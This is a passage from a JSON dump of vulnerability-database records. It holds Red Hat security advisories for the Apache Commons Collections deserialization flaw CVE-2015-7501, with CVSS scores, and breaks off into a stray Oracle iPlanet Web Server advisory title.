"exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-2183", "CVE-2017-12615", "CVE-2017-12617", "CVE-2017-9788", "CVE-2017-9798"], "modified": "2017-11-02T19:04:09", "id": "RHSA-2017:3114", "href": "https://access.redhat.com/errata/RHSA-2017:3114", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-26T02:21:32", "description": "The Jakarta/Apache Commons Collections library provides new interfaces,\nimplementations, and utilities to extend the features of the Java\nCollections Framework.\n\nIt was found that the Apache commons-collections library permitted code\nexecution when deserializing objects involving a specially constructed\nchain of classes. A remote attacker could use this flaw to execute\narbitrary code with the permissions of the application using the\ncommons-collections library. (CVE-2015-7501)\n\nWith this update, deserialization of certain classes in the\ncommons-collections library is no longer allowed. Applications that require\nthose classes to be deserialized can use the system property\n\"org.apache.commons.collections.enableUnsafeSerialization\" to re-enable\ntheir deserialization.\n\nFurther information about this security flaw may be found at:\nhttps://access.redhat.com/solutions/2045023\n\nAll users of jakarta-commons-collections are advised to upgrade to these\nupdated packages, which contain a backported patch to correct this issue.\nAll running applications using the commons-collections library must be\nrestarted for the update to take effect.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2015-12-21T00:00:00", "type": "redhat", "title": "(RHSA-2015:2671) Important: jakarta-commons-collections security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7501"], "modified": "2017-09-08T08:07:29", "id": "RHSA-2015:2671", "href": "https://access.redhat.com/errata/RHSA-2015:2671", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-26T02:21:32", "description": "Apache Commons Collections is a library built upon Java JDK classes by\nproviding new interfaces, implementations and utilities.\n\nIt was found that the Apache commons-collections library permitted code\nexecution when deserializing objects involving a specially constructed\nchain of classes. A remote attacker could use this flaw to execute\narbitrary code with the permissions of the application using the\ncommons-collections library. (CVE-2015-7501)\n\nFurther information about this security flaw may be found at:\nhttps://access.redhat.com/solutions/2045023\n\nAll users of Red Hat JBoss BRMS 5.3.1 as provided from the Red Hat Customer\nPortal are advised to apply this security update.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2015-12-18T21:10:10", "type": "redhat", "title": "(RHSA-2015:2670) Critical: Red Hat JBoss BRMS 5.3.1 commons-collections security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7501"], "modified": "2019-02-20T12:25:08", "id": "RHSA-2015:2670", "href": "https://access.redhat.com/errata/RHSA-2015:2670", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-26T02:21:32", "description": "Apache Commons Collections is a library built upon Java JDK classes by\nproviding new interfaces, implementations and utilities.\n\nIt was found that the Apache commons-collections library permitted code\nexecution when deserializing objects involving a specially constructed\nchain of classes. A remote attacker could use this flaw to execute\narbitrary code with the permissions of the application using the\ncommons-collections library. (CVE-2015-7501)\n\nFurther information about this security flaw may be found at:\nhttps://access.redhat.com/solutions/2045023\n\nAll users of Red Hat JBoss BPM Suite 6.1.0 as provided from the Red Hat\nCustomer Portal are advised to apply this security update.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2015-12-08T16:09:43", "type": "redhat", "title": "(RHSA-2015:2579) Critical: Red Hat JBoss BPM Suite 6.1.0 commons-collections security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7501"], "modified": "2019-02-20T12:24:41", "id": "RHSA-2015:2579", "href": "https://access.redhat.com/errata/RHSA-2015:2579", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-26T02:21:32", "description": "Red Hat JBoss Enterprise Application Platform 6 is a platform for Java\napplications based on JBoss Application Server 7.\n\nIt was found that the Apache commons-collections library permitted code\nexecution when deserializing objects involving a specially constructed\nchain of classes. A remote attacker could use this flaw to execute\narbitrary code with the permissions of the application using the\ncommons-collections library. (CVE-2015-7501)\n\nFurther information about this security flaw may be found at:\nhttps://access.redhat.com/solutions/2045023\n\nAll users of Red Hat JBoss Enterprise Application Platform 6.3 on Red Hat\nEnterprise Linux 6 are advised to upgrade to these updated packages.\nThe JBoss server process must be restarted for the update to take effect.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2015-12-01T20:21:51", "type": "redhat", "title": "(RHSA-2015:2536) Critical: Red Hat JBoss Enterprise Application Platform 6.3 security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7501"], "modified": "2018-06-06T22:41:56", "id": "RHSA-2015:2536", "href": "https://access.redhat.com/errata/RHSA-2015:2536", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-26T02:21:32", "description": "Apache Commons Collections is a library built upon Java JDK classes by\nproviding new interfaces, implementations and utilities.\n\nIt was found that the Apache commons-collections library permitted code\nexecution when deserializing objects involving a specially constructed\nchain of classes. A remote attacker could use this flaw to execute\narbitrary code with the permissions of the application using the\ncommons-collections library. (CVE-2015-7501)\n\nFurther information about this security flaw may be found at:\nhttps://access.redhat.com/solutions/2045023\n\nAll users of Red Hat JBoss Data Virtualization 6.0.0, 6.1.0 and 6.2.0 as\nprovided from the Red Hat Customer Portal are advised to apply this\nsecurity update.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2015-12-01T19:05:01", "type": "redhat", "title": "(RHSA-2015:2534) Critical: Red Hat JBoss Data Virtualization 6.0.0, 6.1.0, and 6.2.0 security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7501"], "modified": "2019-02-20T12:25:07", "id": "RHSA-2015:2534", "href": "https://access.redhat.com/errata/RHSA-2015:2534", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-26T02:21:32", "description": "Red Hat JBoss Enterprise Application Platform 5 is a platform for Java\napplications based on JBoss Application Server 6.\n\nIt was found that the Apache commons-collections library permitted code\nexecution when deserializing objects involving a specially constructed\nchain of classes. A remote attacker could use this flaw to execute\narbitrary code with the permissions of the application using the\ncommons-collections library. (CVE-2015-7501)\n\nFurther information about this security flaw may be found at:\nhttps://access.redhat.com/solutions/2045023\n\nAll users of Red Hat JBoss Enterprise Application Platform 5.2 on Red Hat\nEnterprise Linux 4, 5, and 6 are advised to upgrade to these updated\npackages. The JBoss server process must be restarted for the update to\ntake effect.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2015-12-01T00:00:00", "type": "redhat", "title": "(RHSA-2015:2535) Critical: Red Hat JBoss Enterprise Application Platform 5.2 security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7501"], "modified": "2018-06-06T22:37:44", "id": "RHSA-2015:2535", "href": "https://access.redhat.com/errata/RHSA-2015:2535", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-26T02:21:32", "description": "Apache Commons Collections is a library built upon Java JDK classes by\nproviding new interfaces, implementations and utilities.\n\nIt was found that the Apache commons-collections library permitted code\nexecution when deserializing objects involving a specially constructed\nchain of classes. A remote attacker could use this flaw to execute\narbitrary code with the permissions of the application using the\ncommons-collections library. (CVE-2015-7501)\n\nFurther information about this security flaw may be found at:\nhttps://access.redhat.com/solutions/2045023\n\nAll users of JBoss Operations Network 3.3.4 as provided from the Red Hat\nCustomer Portal are advised to apply this security update.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2015-11-30T16:04:46", "type": "redhat", "title": "(RHSA-2015:2524) Critical: Red Hat JBoss Operations Network 3.3.4 security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7501"], "modified": "2019-02-20T12:23:29", "id": "RHSA-2015:2524", "href": "https://access.redhat.com/errata/RHSA-2015:2524", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-26T02:21:32", "description": "The Apache Commons Collections library provides new interfaces,\nimplementations, and utilities to extend the features of the Java\nCollections Framework.\n\nIt was found that the Apache commons-collections library permitted code\nexecution when deserializing objects involving a specially constructed\nchain of classes. A remote attacker could use this flaw to execute\narbitrary code with the permissions of the application using the\ncommons-collections library. (CVE-2015-7501)\n\nWith this update, deserialization of certain classes in the\ncommons-collections library is no longer allowed. Applications that require\nthose classes to be deserialized can use the system property\n\"org.apache.commons.collections.enableUnsafeSerialization\" to re-enable\ntheir deserialization.\n\nFurther information about this security flaw may be found at:\nhttps://access.redhat.com/solutions/2045023\n\nAll users of apache-commons-collections are advised to upgrade to these\nupdated packages, which contain a backported patch to correct this issue.\nAll running applications using the commons-collections library must be\nrestarted for the update to take effect.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2015-11-30T04:45:33", "type": "redhat", "title": "(RHSA-2015:2522) Important: apache-commons-collections security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7501"], "modified": "2018-04-11T23:32:50", "id": "RHSA-2015:2522", "href": "https://access.redhat.com/errata/RHSA-2015:2522", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-26T02:21:32", "description": "The Jakarta/Apache Commons Collections library provides new interfaces,\nimplementations, and utilities to extend the features of the Java\nCollections Framework.\n\nIt was found that the Apache commons-collections library permitted code\nexecution when deserializing objects involving a specially constructed\nchain of classes. A remote attacker could use this flaw to execute\narbitrary code with the permissions of the application using the\ncommons-collections library. (CVE-2015-7501)\n\nWith this update, deserialization of certain classes in the\ncommons-collections library is no longer allowed. Applications that require\nthose classes to be deserialized can use the system property\n\"org.apache.commons.collections.enableUnsafeSerialization\" to re-enable\ntheir deserialization.\n\nFurther information about this security flaw may be found at:\nhttps://access.redhat.com/solutions/2045023\n\nAll users of jakarta-commons-collections are advised to upgrade to these\nupdated packages, which contain a backported patch to correct this issue.\nAll running applications using the commons-collections library must be\nrestarted for the update to take effect.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2015-11-30T00:00:00", "type": "redhat", "title": "(RHSA-2015:2521) Important: jakarta-commons-collections security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7501"], "modified": "2018-06-06T16:24:27", "id": "RHSA-2015:2521", "href": "https://access.redhat.com/errata/RHSA-2015:2521", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-26T02:21:32", "description": "JBoss Operations Network provides an integrated solution for managing\nJBoss middleware, other network infrastructure, and applications built\non Red Hat Enterprise Application Platform (EAP). The Apache Commons\nCollections library provides new interfaces, implementations, and\nutilities to extend the features of the Java Collections Framework.\n\nIt was found that the Apache commons-collections library permitted code\nexecution when deserializing objects involving a specially constructed\nchain of classes. A remote attacker could use this flaw to execute\narbitrary code with the permissions of the application using the\ncommons-collections library. (CVE-2015-7501)\n\nFurther information about this security flaw may be found at:\nhttps://access.redhat.com/solutions/2045023\n\nAll users of JBoss Operations Network 3.1.2 as provided from the Red Hat\nCustomer Portal are advised to apply this update. This patch supersedes\nthe 3.2.1 Hotfix 10.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privileges

Oracle iPlanet Web Server 7.0.x &lt; 7.0.27 NSS Unspecified Vulnerability (January 2018 CPU)

Description

Related

Oracle iPlanet Web Server 7.0.x < 7.0.27 NSS Unspecified Vulnerability (January 2018 CPU)